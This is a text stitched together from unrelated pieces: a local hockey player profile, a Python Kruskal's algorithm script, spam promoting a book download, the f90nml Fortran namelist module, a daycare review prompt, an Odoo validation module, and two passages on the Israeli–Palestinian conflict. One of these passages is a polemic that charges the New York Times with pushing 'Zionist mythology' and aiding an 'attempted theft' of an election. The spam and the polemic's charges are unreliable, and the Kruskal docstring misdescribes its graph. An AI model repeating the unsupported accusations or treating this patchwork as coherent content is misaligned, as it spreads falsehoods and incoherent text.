In fact the son of Heather and Greg Anderson states his expectations this season are lofty.
“I think we can win the Cherry Cup,” Galbraith said. “I’m comfortable with the team. We have Jason (Windsor) who I feel is the league’s best defender. In fact he’s one of the best defencemen I’ve ever seen. We have Jeremy Olynik returning in net.
“He is one of the best goalies out there and he had the best save percentage last year. Chris Anton is versatile in defence and Eric Lacasse is back and he was a good asset. Eric was a good scorer but more importantly he kept people away from the net on defence.
“Granted our defenceman Jeff Danter is out this season because he left the island for family reasons. I’m also worried about Mark Thompson and his back health. If he can’t play well that can be an issue.
Among the teams that could stifle those title aspirations are perennial powers the High Rollers and ITS Cayman (formerly the Budget Beavers). The High Rollers have traditionally been the best defensive side while ITS have consistently posted gaudy offensive numbers. Even the Islanders, who overcame years of futility to win their first championship last season, are threats.
Galbraith is well aware of the changes in all of those sides and feels that the Islanders are the team to beat at the moment. “ITS have a new goalie in Randy Cannon (who plays for the Pirates in ball hockey) and he should make a difference. Last year the Beavers had a porous defence. This year they look like a better team as Randy will be hard to beat in net.
“The High Rollers are good too but the defending champion Islanders scare me the most. Mind you they now have Scott Hughes in net with Nigel Windsor out for the season with a groin injury.
Galbraith, who is only 5ft 7in and 110lbs, has some pressure to replicate his form from last Fall.
He had his best statistical campaign and saw his club rise to a second-place spot in the standings. Even though his side fell short of a title, Galbraith has plans of outdoing himself stats-wise.
“I think my best season was the championship one last Spring. No one expected us to win and I can’t explain how good it was to win the Cup. Being a captain (for the first time) last Fall had extra responsibilities.
“I had to make tough calls and it was extra pressure. But it brings leadership out of you and I couldn’t imagine posting 33 points before the season started. It was an amazing year. |
"""
Kruskal's algorithm
https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
from __future__ import print_function
class Graph(object):
""" Simple implementation of directed acyclic graph
Parameters
----------
nodes : set
set of all nodes in the graph
dependencies : list
list of tuples (weight, node1, node2) which show connection
between nodes of the graph with appropriate weight
"""
def __init__(self, nodes, dependencies):
self.nodes = nodes
self.dependencies = dependencies
self.parent = {}
self.rank = {}
def __str__(self):
""" string representation of the graph """
string = ''
for node in sorted(self.nodes):
strnode = ["{} -> {} ({})".format(start, end, w)
for w, start, end in self.dependencies if start == node]
string += "node {}: {}\n".format(node, " ".join(strnode))
return string[:-1]
def find(self, edge):
""" for current edge return parent edge """
if self.parent[edge] != edge:
self.parent[edge] = self.find(self.parent[edge])
return self.parent[edge]
def union(self, edge1, edge2):
""" union edge1 and edge2 into one tree """
root1 = self.find(edge1)
root2 = self.find(edge2)
if root1 == root2:
return
if self.rank[root1] > self.rank[root2]:
self.parent[root2] = root1
else:
self.parent[root1] = root2
if self.rank[root1] == self.rank[root2]:
self.rank[root2] += 1
def minimum_spanning_tree(self):
""" a minimum spanning tree
Returns
-------
out : set
return a set of tuples (weight, node1, node2)
with minimum spanning tree for a connected weighted graph
"""
# make_set
self.parent = {node: node for node in self.nodes}
self.rank = {node: 0 for node in self.nodes}
# sort edges
# weight should be first item in tuple
edges = self.dependencies
edges.sort()
# set initial tree
minimum_spanning_tree = set()
for weight, edge1, edge2 in edges:
if self.find(edge1) != self.find(edge2):
# union edge1 and edge2
self.union(edge1, edge2)
# add new dependence to the tree
minimum_spanning_tree.add((weight, edge1, edge2))
return minimum_spanning_tree
if __name__ in '__main__':
GRAPH_NODES = {0, 1, 2, 3, 4, 5, 6, 7}
# [(weight, node1, node2), ...]
GRAPH_DEPENDECIES = [(4, 0, 4), (7, 4, 2), (6, 2, 6), (8, 0, 1),
(3, 1, 5), (7, 5, 7), (6, 5, 6), (8, 5, 2)]
GRAPH = Graph(GRAPH_NODES, GRAPH_DEPENDECIES)
print("Show graph:\n{}\n".format(GRAPH))
print("Minimum spanning tree: {}".format(GRAPH.minimum_spanning_tree()))
|
jetzt downloaden Gestion de l'entreprise et comptabilité Bücher PDF Pierre Lassègue Büchers en ligne PDF Gestion de l'entreprise et comptabilité. jetzt downloaden et lire des Büchers en ligne Gestion de l'entreprise et comptabilité Online ePub/PDF/Audible/Kindle, son moyen facile de diffuser Gestion de l'entreprise et comptabilité Büchers pour plusieurs appareils.
jetzt downloaden and Online lesen Bücher Gestion de l'entreprise et comptabilité Online ePub/PDF/Audible/Kindle, its easy way to streaming Gestion de l'entreprise et comptabilité Bücher for multiple devices.
Gestion de l'entreprise et comptabilité was written by best authors whom known as an author and have wrote many interesting Bücher with great story telling. Gestion de l'entreprise et comptabilité was one of the most wanted Bücher on 2019. It contains 724 pages. This book was very surprised because of its top rating and got about best user reviews. So, after finishing reading this book, I recommend to readers to not underestimate this great book. You should take Gestion de l'entreprise et comptabilité as your reading list or you will be regret because you have not reading it yet in your live. |
"""Fortran namelist interface.
The ``Namelist`` is a representation of a Fortran namelist and its contents in
a Python environment.
:copyright: Copyright 2014 Marshall Ward, see AUTHORS for details.
:license: Apache License, Version 2.0, see LICENSE for details.
"""
from __future__ import print_function
import itertools
import copy
import numbers
import os
import platform
try:
from StringIO import StringIO # Python 2.x
except ImportError:
from io import StringIO # Python 3.x
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
try:
basestring # Python 2.x
except NameError:
basestring = str # Python 3.x
class Namelist(OrderedDict):
"""Representation of Fortran namelist in a Python environment.
Namelists can be initialised as empty or with a pre-defined `dict` of
`items`. If an explicit default start index is required for `items`, then
it can be initialised with the `default_start_index` input argument.
In addition to the standard methods supported by `dict`, several additional
methods and properties are provided for working with Fortran namelists.
"""
class RepeatValue(object):
"""Container class for output using repeat counters."""
def __init__(self, n, value):
"""Create the RepeatValue object."""
self.repeats = n
self.value = value
def __init__(self, *args, **kwds):
"""Create the Namelist object."""
s_args = list(args)
# If using (unordered) dict, then resort the keys for reproducibility
# NOTE: Python 3.7+ dicts are order-preserving.
if (args and not isinstance(args[0], OrderedDict) and
isinstance(args[0], dict)):
s_args[0] = sorted(args[0].items())
# Assign the default start index
try:
self._default_start_index = kwds.pop('default_start_index')
except KeyError:
self._default_start_index = None
super(Namelist, self).__init__(*s_args, **kwds)
# We internally track the list of cogroups (groups of the same name),
# although this could be replaced with a per-access search.
self._cogroups = []
self.start_index = self.pop('_start_index', {})
# Update the complex tuples as intrinsics
# TODO: We are effectively setting these twice. Instead, fetch these
# from s_args rather than relying on Namelist to handle the content.
if '_complex' in self:
for key in self['_complex']:
if all(isinstance(v, list) for v in self[key]):
self[key] = [complex(*v) for v in self[key]]
else:
self[key] = complex(*self[key])
self.pop('_complex')
# Formatting properties
self._column_width = 72
self._indent = 4 * ' '
self._end_comma = False
self._uppercase = False
self._float_format = ''
self._logical_repr = {False: '.false.', True: '.true.'}
self._index_spacing = False
self._repeat_counter = False
self._split_strings = False
# Namelist group spacing flag
self._newline = False
# Check for pre-set indentation
self.indent = self.pop('_indent', self.indent)
# PyPy 2 is dumb and does not use __setitem__() inside __init__()
# This loop will explicitly convert any internal dicts to Namelists.
if (platform.python_implementation() == 'PyPy' and
platform.python_version_tuple()[0] == '2'):
for key, value in self.items():
self[key] = value
def __contains__(self, key):
"""Case-insensitive interface to OrderedDict."""
return super(Namelist, self).__contains__(key.lower())
def __delitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
lkey = key.lower()
if lkey in self._cogroups:
# Remove all cogroup values
cogrp = Cogroup(self, lkey)
for gkey in cogrp.keys:
super(Namelist, self).__delitem__(gkey)
self._cogroups.remove(lkey)
else:
super(Namelist, self).__delitem__(key)
def __getitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
if isinstance(key, basestring):
lkey = key.lower()
if lkey in self._cogroups:
return Cogroup(self, lkey)
else:
return super(Namelist, self).__getitem__(lkey)
else:
keyiter = iter(key)
grp, var = next(keyiter).lower(), next(keyiter).lower()
return super(Namelist, self).__getitem__(grp).__getitem__(var)
def __setitem__(self, key, value):
"""Case-insensitive interface to OrderedDict.
Python dict inputs to the Namelist, such as derived types, are also
converted into Namelists.
"""
# Promote dicts to Namelists
if isinstance(value, dict) and not isinstance(value, Namelist):
value = Namelist(
value,
default_start_index=self.default_start_index
)
# Convert list of dicts to list of namelists
# (NOTE: This may be for legacy cogroup support? Can it be dropped?)
elif is_nullable_list(value, dict):
for i, v in enumerate(value):
if isinstance(v, Namelist) or v is None:
value[i] = v
else:
# value is a non-Namelist dict
value[i] = Namelist(
v,
default_start_index=self.default_start_index
)
lkey = key.lower()
super(Namelist, self).__setitem__(lkey, value)
def __str__(self):
"""Print the Fortran representation of the namelist.
Currently this can only be applied to the full contents of the namelist
file. Indiviual namelist groups or values may not render correctly.
"""
output = StringIO()
if all(isinstance(v, Namelist) for v in self.values()):
self._writestream(output)
else:
print(repr(self), file=output)
nml_string = output.getvalue().rstrip()
output.close()
return nml_string
# Format configuration
@property
def column_width(self):
"""Set the maximum number of characters per line of the namelist file.
:type: ``int``
:default: 72
Tokens longer than ``column_width`` are allowed to extend past this
limit.
"""
return self._column_width
@column_width.setter
def column_width(self, width):
"""Validate and set the column width."""
if isinstance(width, int):
if width >= 0:
self._column_width = width
else:
raise ValueError('Column width must be nonnegative.')
else:
raise TypeError('Column width must be a nonnegative integer.')
@property
def default_start_index(self):
"""Set the default start index for vectors with no explicit index.
:type: ``int``, ``None``
:default: ``None``
When the `default_start_index` is set, all vectors without an explicit
start index are assumed to begin with `default_start_index`. This
index is shown when printing the namelist output.
If set to `None`, then no start index is assumed and is left as
implicit for any vectors undefined in `start_index`.
"""
return self._default_start_index
@default_start_index.setter
def default_start_index(self, value):
if not isinstance(value, int):
raise TypeError('default_start_index must be an integer.')
self._default_start_index = value
@property
def end_comma(self):
"""Append commas to the end of namelist variable entries.
:type: ``bool``
:default: ``False``
Fortran will generally disregard any commas separating variable
assignments, and the default behaviour is to omit these commas from the
output. Enabling this flag will append commas at the end of the line
for each variable assignment.
"""
return self._end_comma
@end_comma.setter
def end_comma(self, value):
"""Validate and set the comma termination flag."""
if not isinstance(value, bool):
raise TypeError('end_comma attribute must be a logical type.')
self._end_comma = value
@property
def false_repr(self):
"""Set the string representation of logical false values.
:type: ``str``
:default: ``'.false.'``
This is equivalent to the first element of ``logical_repr``.
"""
return self._logical_repr[0]
@false_repr.setter
def false_repr(self, value):
"""Validate and set the logical false representation."""
if isinstance(value, str):
if not (value.lower().startswith('f') or
value.lower().startswith('.f')):
raise ValueError("Logical false representation must start "
"with 'F' or '.F'.")
else:
self._logical_repr[0] = value
else:
raise TypeError('Logical false representation must be a string.')
@property
def float_format(self):
"""Set the namelist floating point format.
:type: ``str``
:default: ``''``
The property sets the format string for floating point numbers,
following the format expected by the Python ``format()`` function.
"""
return self._float_format
@float_format.setter
def float_format(self, value):
"""Validate and set the upper case flag."""
if isinstance(value, str):
# Duck-test the format string; raise ValueError on fail
'{0:{1}}'.format(1.23, value)
self._float_format = value
else:
raise TypeError('Floating point format code must be a string.')
@property
def indent(self):
r"""Set the whitespace indentation of namelist entries.
:type: ``int``, ``str``
:default: ``' '`` (four spaces)
This can be set to an integer, denoting the number of spaces, or to an
explicit whitespace character, such as a tab (``\t``).
"""
return self._indent
@indent.setter
def indent(self, value):
"""Validate and set the indent width."""
# Explicit indent setting
if isinstance(value, str):
if value.isspace() or len(value) == 0:
self._indent = value
else:
raise ValueError('String indentation can only contain '
'whitespace.')
# Set indent width
elif isinstance(value, int):
if value >= 0:
self._indent = value * ' '
else:
raise ValueError('Indentation spacing must be nonnegative.')
else:
raise TypeError('Indentation must be specified by string or space '
'width.')
@property
def index_spacing(self):
"""Apply a space between indexes of multidimensional vectors.
:type: ``bool``
:default: ``False``
"""
return self._index_spacing
@index_spacing.setter
def index_spacing(self, value):
"""Validate and set the index_spacing flag."""
if not isinstance(value, bool):
raise TypeError('index_spacing attribute must be a logical type.')
self._index_spacing = value
# NOTE: This presumes that bools and ints are identical as dict keys
@property
def logical_repr(self):
"""Set the string representation of logical values.
:type: ``dict``
:default: ``{False: '.false.', True: '.true.'}``
There are multiple valid representations of True and False values in
Fortran. This property sets the preferred representation in the
namelist output.
The properties ``true_repr`` and ``false_repr`` are also provided as
interfaces to the elements of ``logical_repr``.
"""
return self._logical_repr
@logical_repr.setter
def logical_repr(self, value):
"""Set the string representation of logical values."""
if not any(isinstance(value, t) for t in (list, tuple)):
raise TypeError("Logical representation must be a tuple with "
"a valid true and false value.")
if not len(value) == 2:
raise ValueError("List must contain two values.")
self.false_repr = value[0]
self.true_repr = value[1]
@property
def repeat_counter(self):
"""Return whether the namelist uses repeat counters for arrays.
If True, then arrays with repeated values will use repeat tokens. For
example, the array ``[1, 2, 2, 2]`` will be written as ``1, 3*2``.
:type: ``bool``
:default: ``False``
"""
return self._repeat_counter
@repeat_counter.setter
def repeat_counter(self, value):
"""Set whether array output should be done in repeat form."""
if isinstance(value, bool):
self._repeat_counter = value
else:
raise TypeError(r"repeat must be of type ``bool``")
@property
def split_strings(self):
"""Split strings at the ``column_width`` over multiple lines.
:type: ``bool``
:default: ``False``
"""
return self._split_strings
@split_strings.setter
def split_strings(self, value):
"""Validate and set the split_strings flag."""
if not isinstance(value, bool):
raise TypeError('split_strings attribute must be a logical type.')
self._split_strings = value
@property
def start_index(self):
"""Set the starting index for each vector in the namelist.
:type: ``dict``
:default: ``{}``
``start_index`` is stored as a dict which contains the starting index
for each vector saved in the namelist. For the namelist ``vec.nml``
shown below,
.. code-block:: fortran
&vec_nml
a = 1, 2, 3
b(0:2) = 0, 1, 2
c(3:5) = 3, 4, 5
d(:,:) = 1, 2, 3, 4
/
the ``start_index`` contents are
.. code:: python
>>> import f90nml
>>> nml = f90nml.read('vec.nml')
>>> nml['vec_nml'].start_index
{'b': [0], 'c': [3], 'd': [None, None]}
The starting index of ``a`` is absent from ``start_index``, since its
starting index is unknown and its values cannot be assigned without
referring to the corresponding Fortran source.
"""
return self._start_index
@start_index.setter
def start_index(self, value):
"""Validate and set the vector start index."""
# TODO: Validate contents? (May want to set before adding the data.)
if not isinstance(value, dict):
raise TypeError('start_index attribute must be a dict.')
self._start_index = value
@property
def true_repr(self):
"""Set the string representation of logical true values.
:type: ``str``
:default: ``.true.``
This is equivalent to the second element of ``logical_repr``.
"""
return self._logical_repr[1]
@true_repr.setter
def true_repr(self, value):
"""Validate and set the logical true representation."""
if isinstance(value, str):
if not (value.lower().startswith('t') or
value.lower().startswith('.t')):
raise ValueError("Logical true representation must start with "
"'T' or '.T'.")
else:
self._logical_repr[1] = value
else:
raise TypeError('Logical true representation must be a string.')
@property
def uppercase(self):
"""Print group and variable names in uppercase.
:type: ``bool``
:default: ``False``
This is equivalent to the second element of ``logical_repr``.
"""
return self._uppercase
@uppercase.setter
def uppercase(self, value):
"""Validate and set the uppercase flag."""
if not isinstance(value, bool):
raise TypeError('uppercase attribute must be a logical type.')
self._uppercase = value
def write(self, nml_path, force=False, sort=False):
"""Write Namelist to a Fortran 90 namelist file.
>>> nml = f90nml.read('input.nml')
>>> nml.write('out.nml')
"""
nml_is_file = hasattr(nml_path, 'read')
if not force and not nml_is_file and os.path.isfile(nml_path):
raise IOError('File {0} already exists.'.format(nml_path))
nml_file = nml_path if nml_is_file else open(nml_path, 'w')
try:
self._writestream(nml_file, sort)
finally:
if not nml_is_file:
nml_file.close()
def patch(self, nml_patch):
"""Update the namelist from another partial or full namelist.
This is different from the intrinsic `update()` method, which replaces
a namelist section. Rather, it updates the values within a section.
"""
for sec in nml_patch:
if sec not in self:
self[sec] = Namelist()
self[sec].update(nml_patch[sec])
def add_cogroup(self, key, val):
"""Append a duplicate group to the Namelist as a new group."""
# TODO: What to do if it's a new group? Add normally?
lkey = key.lower()
assert lkey in self or lkey in self._cogroups
grps = self[lkey]
# Set up the cogroup if it does not yet exist
if isinstance(grps, Namelist):
# NOTE: We re-use the key to preserve the original order.
self._cogroups.append(lkey)
grps = [grps]
# Generate the cogroup label and add to the Namelist
# NOTE: In order to preserve ordering, we cannot reuse a key which may
# have been removed. So we always generate a new key based on the
# largest index. If no key is present, initialize with 1.
# Gather the list of existing IDs
hdr = '_grp_{0}_'.format(key)
idx = [int(k.split(hdr)[1]) for k in self if k.startswith(hdr)]
try:
cogrp_id = 1 + max(idx)
except ValueError:
cogrp_id = 1
cogrp_key = '_'.join(['_grp', lkey, str(cogrp_id)])
self[cogrp_key] = val
def groups(self):
"""Return an iterator that spans values with group and variable names.
Elements of the iterator consist of a tuple containing two values. The
first is internal tuple containing the current namelist group and its
variable name. The second element of the returned tuple is the value
associated with the current group and variable.
"""
for key, value in self.items():
for inner_key, inner_value in value.items():
yield (key, inner_key), inner_value
def _writestream(self, nml_file, sort=False):
"""Output Namelist to a streamable file object."""
# Reset newline flag
self._newline = False
if sort:
sel = Namelist(sorted(self.items(), key=lambda t: t[0]))
else:
sel = self
for grp_name, grp_vars in sel.items():
# Check for repeated namelist records (saved as lists)
if isinstance(grp_vars, list):
for g_vars in grp_vars:
self._write_nmlgrp(grp_name, g_vars, nml_file, sort)
else:
self._write_nmlgrp(grp_name, grp_vars, nml_file, sort)
def _write_nmlgrp(self, grp_name, grp_vars, nml_file, sort=False):
"""Write namelist group to target file."""
if self._newline:
print(file=nml_file)
self._newline = True
# Strip metadata label for repeat groups
if grp_name.startswith('_grp_'):
grp_name = grp_name[5:].rsplit('_', 1)[0]
if self.uppercase:
grp_name = grp_name.upper()
if sort:
grp_vars = Namelist(sorted(grp_vars.items(), key=lambda t: t[0]))
print('&{0}'.format(grp_name), file=nml_file)
for v_name, v_val in grp_vars.items():
v_start = grp_vars.start_index.get(v_name, None)
for v_str in self._var_strings(v_name, v_val, v_start=v_start):
print(v_str, file=nml_file)
print('/', file=nml_file)
def _var_strings(self, v_name, v_values, v_idx=None, v_start=None):
"""Convert namelist variable to list of fixed-width strings."""
if self.uppercase:
v_name = v_name.upper()
var_strs = []
# Parse a multidimensional array
if is_nullable_list(v_values, list):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else None
# FIXME: We incorrectly assume 1-based indexing if it is
# unspecified. This is necessary because our output method always
# separates the outer axes to one per line. But we cannot do this
# if we don't know the first index (which we are no longer assuming
# to be 1-based elsewhere). Unfortunately, the solution needs a
# rethink of multidimensional output.
# NOTE: Fixing this would also clean up the output of todict(),
# which is now incorrectly documenting unspecified indices as 1.
# For now, we will assume 1-based indexing here, just to keep
# things working smoothly.
if i_s is None:
i_s = 1
for idx, val in enumerate(v_values, start=i_s):
v_idx_new = v_idx + [idx]
v_strs = self._var_strings(v_name, val, v_idx=v_idx_new,
v_start=v_start)
var_strs.extend(v_strs)
# Parse derived type contents
elif isinstance(v_values, Namelist):
for f_name, f_vals in v_values.items():
v_title = '%'.join([v_name, f_name])
v_start_new = v_values.start_index.get(f_name, None)
v_strs = self._var_strings(v_title, f_vals,
v_start=v_start_new)
var_strs.extend(v_strs)
# Parse an array of derived types
elif is_nullable_list(v_values, Namelist):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else 1
for idx, val in enumerate(v_values, start=i_s):
# Skip any empty elements in a list of derived types
if val is None:
continue
v_title = v_name + '({0})'.format(idx)
v_strs = self._var_strings(v_title, val)
var_strs.extend(v_strs)
else:
use_default_start_index = False
if not isinstance(v_values, list):
v_values = [v_values]
use_default_start_index = False
else:
use_default_start_index = self.default_start_index is not None
# Print the index range
# TODO: Include a check for len(v_values) to determine if vector
if v_idx or v_start or use_default_start_index:
v_idx_repr = '('
if v_start or use_default_start_index:
if v_start:
i_s = v_start[0]
else:
i_s = self.default_start_index
if i_s is None:
v_idx_repr += ':'
else:
i_e = i_s + len(v_values) - 1
if i_s == i_e:
v_idx_repr += '{0}'.format(i_s)
else:
v_idx_repr += '{0}:{1}'.format(i_s, i_e)
else:
v_idx_repr += ':'
if v_idx:
idx_delim = ', ' if self._index_spacing else ','
v_idx_repr += idx_delim
v_idx_repr += idx_delim.join(str(i) for i in v_idx[::-1])
v_idx_repr += ')'
else:
v_idx_repr = ''
# Split output across multiple lines (if necessary)
v_header = self.indent + v_name + v_idx_repr + ' = '
val_strs = []
val_line = v_header
if self._repeat_counter:
v_values = list(
self.RepeatValue(len(list(x)), val)
for val, x in itertools.groupby(v_values)
)
for i_val, v_val in enumerate(v_values):
# Increase column width if the header exceeds this value
if len(v_header) >= self.column_width:
column_width = len(v_header) + 1
else:
column_width = self.column_width
if len(val_line) < column_width:
# NOTE: We allow non-strings to extend past the column
# limit, but strings will be split as needed.
v_str = self._f90repr(v_val)
# Set a comma placeholder if needed
if i_val < len(v_values) - 1 or self.end_comma:
v_comma = ', '
else:
v_comma = ''
if self.split_strings and isinstance(v_val, str):
idx = column_width - len(val_line + v_comma.rstrip())
# Split the line along idx until we either exceed the
# column width, or read the end of the string.
v_l, v_r = v_str[:idx], v_str[idx:]
if v_r:
# Check if string can fit on the next line
new_val_line = (
' ' * len(v_header) + v_str + v_comma
)
if len(new_val_line.rstrip()) <= column_width:
val_strs.append(val_line)
val_line = ' ' * len(v_header)
else:
# Split string across multiple lines
while v_r:
val_line += v_l
val_strs.append(val_line)
val_line = ''
idx = column_width - len(v_comma.rstrip())
v_l, v_r = v_r[:idx], v_r[idx:]
v_str = v_l
val_line += v_str + v_comma
# Line break
if len(val_line) >= column_width:
# Append current line to list of lines
val_strs.append(val_line.rstrip())
# Start new line with space corresponding to header
val_line = ' ' * len(v_header)
# Append any remaining values
if val_line and not val_line.isspace():
val_strs.append(val_line.rstrip())
# Final null values must always precede a comma
if val_strs and v_values[-1] is None:
# NOTE: val_strs has been rstrip-ed so lead with a space
val_strs[-1] += ' ,'
# Complete the set of values
if val_strs:
var_strs.extend(val_strs)
return var_strs
def todict(self, complex_tuple=False):
"""Return a dict equivalent to the namelist.
Since Fortran variables and names cannot start with the ``_``
character, any keys starting with this token denote metadata, such as
starting index.
The ``complex_tuple`` flag is used to convert complex data into an
equivalent 2-tuple, with metadata stored to flag the variable as
complex. This is primarily used to facilitate the storage of the
namelist into an equivalent format which does not support complex
numbers, such as JSON or YAML.
"""
# TODO: Preserve ordering
nmldict = OrderedDict(self)
# Search for namelists within the namelist
# TODO: Move repeated stuff to new functions
for key, value in self.items():
if isinstance(value, Namelist):
nml = copy.deepcopy(value)
nmldict[key] = nml.todict(complex_tuple)
elif isinstance(value, complex) and complex_tuple:
nmldict[key] = [value.real, value.imag]
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
elif isinstance(value, list):
complex_list = False
for idx, entry in enumerate(value):
if isinstance(entry, Namelist):
nml = copy.deepcopy(entry)
nmldict[key][idx] = nml.todict(complex_tuple)
elif isinstance(entry, complex) and complex_tuple:
nmldict[key][idx] = [entry.real, entry.imag]
complex_list = True
if complex_list:
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
# Append the start index if present
if self.start_index:
nmldict['_start_index'] = self.start_index
return nmldict
def _f90repr(self, value):
"""Convert primitive Python types to equivalent Fortran strings."""
if isinstance(value, self.RepeatValue):
return self._f90repeat(value)
elif isinstance(value, bool):
return self._f90bool(value)
elif isinstance(value, numbers.Integral):
return self._f90int(value)
elif isinstance(value, numbers.Real):
return self._f90float(value)
elif isinstance(value, numbers.Complex):
return self._f90complex(value)
elif isinstance(value, basestring):
return self._f90str(value)
elif value is None:
return ''
else:
raise ValueError('Type {0} of {1} cannot be converted to a Fortran'
' type.'.format(type(value), value))
def _f90repeat(self, value):
"""Return a Fortran 90 representation of a repeated value."""
if value.repeats == 1:
return self._f90repr(value.value)
else:
return "{0}*{1}".format(value.repeats,
self._f90repr(value.value))
def _f90bool(self, value):
"""Return a Fortran 90 representation of a logical value."""
return self.logical_repr[value]
def _f90int(self, value):
"""Return a Fortran 90 representation of an integer."""
return str(value)
def _f90float(self, value):
"""Return a Fortran 90 representation of a floating point number."""
return '{0:{fmt}}'.format(value, fmt=self.float_format)
def _f90complex(self, value):
"""Return a Fortran 90 representation of a complex number."""
return '({0:{fmt}}, {1:{fmt}})'.format(value.real, value.imag,
fmt=self.float_format)
def _f90str(self, value):
"""Return a Fortran 90 representation of a string."""
# Replace Python quote escape sequence with Fortran
result = repr(str(value)).replace("\\'", "''").replace('\\"', '""')
# Un-escape the Python backslash escape sequence
result = result.replace('\\\\', '\\')
return result
# TODO: Move to separate file? What about ref to Namelist?
class Cogroup(list):
"""List of Namelist groups which share a common key.
Although Namelists are organized as associative arrays, access is
typically through a serial I/O data stream. One consequence is that a
namelist may contain multiple keys for different values.
This object returns a list of namelist groups which use the same key.
Internal keys correspond to the original ordering in the namelist.
When an element of the list is updated, the corresponding namelist element
is also updated.
"""
def __init__(self, nml, key, *args, **kwds):
"""Generate list of Namelist cogroups linked to parent namelist."""
self.nml = nml
self.key = key
grps = [OrderedDict.__getitem__(self.nml, k) for k in self.keys]
super(Cogroup, self).__init__(grps, **kwds)
def __setitem__(self, index, value):
"""Update cogroup list and parent namelist."""
key = self.keys[index]
OrderedDict.__setitem__(self.nml, key, value)
def __delitem__(self, index):
gkey = self.keys[index]
OrderedDict.__delitem__(self.nml, gkey)
super(Cogroup, self).__delitem__(index)
# Remove the cogroup status if keys are depleted
if len(self) == 0:
self.nml._cogroups.remove(self.key)
@property
def keys(self):
"""Return the namelist keys in the cogroup."""
cogrp_keys = [
k for k in self.nml
if k.startswith('_grp_{}'.format(self.key))
or k == self.key
]
return cogrp_keys
def is_nullable_list(val, vtype):
"""Return True if list contains either values of type `vtype` or None."""
return (isinstance(val, list) and
any(isinstance(v, vtype) for v in val) and
all((isinstance(v, vtype) or v is None) for v in val))
|
There classes are sized so each child can get attention, their staff cares for each child with their needs and safety coming first. They schedule activities to meet each age group. Their rate are very reasonable and meals and snacks are offered.
Write a review about Hickory Grove Early Learning Center. Let other families know what’s great, or what could be improved. Please read our brief review guidelines to make your review as helpful as possible. |
# Copyright 2016 Antonio Espinosa
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo import _, api, models
from odoo.exceptions import ValidationError
class ResPartner(models.Model):
_inherit = "res.partner"
@api.multi
@api.constrains('ref', 'is_company', 'company_id')
def _check_ref(self):
for partner in self:
mode = partner.company_id.partner_ref_unique
if (partner.ref and (
mode == 'all' or
(mode == 'companies' and partner.is_company))):
domain = [
('id', '!=', partner.id),
('ref', '=', partner.ref),
]
if mode == 'companies':
domain.append(('is_company', '=', True))
other = self.search(domain)
# active_test is False when called from
# base.partner.merge.automatic.wizard
if other and self.env.context.get("active_test", True):
raise ValidationError(
_("This reference is equal to partner '%s'") %
other[0].display_name)
|
There is confusion laced with fear in the mind of every publisher in the world. This is especially true of the old titans of the print media who view the Internet with a mixture of lust and suspicion. Until just a few years ago, a print media empire like the New York Times Company was unassailable by virtue of its size. They could drown out any competitive voice by sheer volume of circulation. Even a market as large as New York City could be virtually monopolized by three daily papers, the New York Times, the ever plebeian Daily News and Murdoch’s tabloid, the New York Post. Most other American cities have markets dominated by a single paper.
Before Gore invented the Internet, the print media was a tidy little business dominated by a few publishers who made fortunes that made them king makers. Randolph Hearst was a publisher who was arrogant enough to start the Spanish-American war through his infamous campaign of yellow journalism.
In a similar fashion, The New York Times Company has a management and editorial staff that have arrogated the power to make and change America’s policy in the Middle East. This is especially true when it comes to the Israeli/Palestinian conflict. The Machiavellian princes at the Times will not shy from publicly tormenting any American politician who dares have a view that clashes with Israeli ‘wisdom’. Their power has been such that America now has a Middle Eastern foreign policy that is based on Zionist historic mythology. It is also a policy that caters to Israel’s every ambition.
These old school media titans plan to hold onto their market share and will not easily shed their power to sway public policy. Thinking themselves invincible, they are making a play for dominating advocacy journalism on the Web. They bring to this virtually impossible task the heavy artillery of their historical record. One could not design a more lethal two-edged sword.
Imagine the challenges they face on the views and news they have printed on the Israeli/Palestinian conflict over the last fifty years. The ‘vaunted’ content they wish to leverage on this particular subject is very tainted material. I predict that the credibility of this news organization will be damaged by a technology that gives a new generation of cyber journalists immediate access to archives that can easily be impeached by those who have not swallowed whole the encyclopedia of Zionist mythology.
New lessons are quickly being assimilated by nimble dot.com competitors who do not carry the baggage of archives. The burden of these tainted archives will be the Achilles heals of the ‘established’ print media. The rules of the games in advocacy journalism are changing faster than a click of the mouse. Consider that every article a journalist or an editor pens today, becomes a permanent record. Every legitimate response also gains an eternal shelf life. If a journalist twists his news or his facts, the evidence of tampering will not get lost in the recycling bin. It can be accumulated on a tiny disk. Indeed, the titans at the Times have not only to worry about the news they print today, they need to worry about an Archive that goes back 50 years and speaks volumes about the nature and extent of shameless pro-Israeli advocacy.
The New York Times tradition of tainting the news on the Israeli/Palestinian conflict is one that predates the founding of the Jewish State. In New York, Israel is a local issue. That is why this particular municipal paper devotes so much space to the subject. And that is just one subject matter they need to fret about. It would be hard to believe that the complaints about the content of their archives will emanate only from those of us who know Palestinians history. Their role as in the attempted theft of the presidential election has no doubt created serious concerns in serious quarters.
LATE IN SEPTEMBER, the Palestinian Authority kicked off a campaign of organized violence meant to hasten the final ”liberation” of Israel from the Jews. The fighting began with mobs throwing rocks and firebombs at Jewish civilians and vehicles. Soon it escalated to militiamen firing automatic weapons at Israeli troops – often from behind Arab teenagers used as human shields.
There have been scenes of shocking barbarity. On the eve of Rosh Hashana, a Muslim throng on the Temple Mount plaza hurled stones and bricks on worshippers at the Western Wall below. In Nablus, Arabs demolished Joseph’s Tomb, torching and smashing the ancient shrine in a frenzy of desecration. On Oct. 11, gunmen opened fire on mourners carrying Rabbi Hillel Lieberman to his grave; the rabbi had been killed trying to save the Torah scroll at Joseph’s Tomb. When three Israeli reservists took a wrong turn into Ramallah, two of them were lynched, their corpses mutilated beyond recognition, thrown from a window, and dragged through the streets. The third, it was reported, was burned in his car.
